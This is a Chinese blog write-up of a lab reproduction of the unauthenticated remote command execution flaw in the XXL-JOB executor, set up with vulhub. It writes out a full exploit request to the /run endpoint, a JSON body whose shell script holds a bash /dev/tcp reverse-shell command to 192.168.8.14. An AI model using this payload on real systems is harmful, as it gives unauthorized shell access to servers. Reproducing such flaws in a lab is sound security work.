当前位置:   article > 正文

xxl-job远程命令执行漏洞复现_xxljob漏洞

xxljob漏洞

1、漏洞描述

XXL-JOB是一个分布式任务调度平台,其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线,开箱即用。XXL-JOB分为admin和executor两端,前者为后台管理页面,后者是任务执行的客户端。executor默认没有配置认证,未授权的攻击者可以通过RESTful API执行任意命令。

2、靶场搭建

靶场使用vulhub
进入vulhub/xxl-job/unacc目录下,执行docker-compose up -d
在这里插入图片描述
容器起来后,docker ps -a看一下
在这里插入图片描述
浏览器访问http://your-ip:9999
在这里插入图片描述
看到如上图,说明漏洞环境部署成功。

3、漏洞复现(反弹shell)

浏览器访问http://your-ip:9999/run,并通过bp抓包
在这里插入图片描述

修改请求方式为POST ,并写入exp,然后发送请求

exp:

{
  "jobId": 1,
  "executorHandler": "demoJobHandler",
  "executorParams": "demoJobHandler",
  "executorBlockStrategy": "COVER_EARLY",
  "executorTimeout": 0,
  "logId": 1,
  "logDateTime": 1586629003729,
  "glueType": "GLUE_SHELL",
  "glueSource": "echo 'bash -i >& /dev/tcp/192.168.8.14/9999 0>&1' > /tmp/1.sh",
  "glueUpdatetime": 1586699003758,
  "broadcastIndex": 0,
  "broadcastTotal": 0
}
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14

在这里插入图片描述
将/tmp/1.sh赋予可执行权限
在这里插入图片描述
开启nc监听
在这里插入图片描述
执行命令:
在这里插入图片描述
查看nc监听,反弹成功
在这里插入图片描述

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/你好赵伟/article/detail/453213
推荐阅读
相关标签
  

闽ICP备14008679号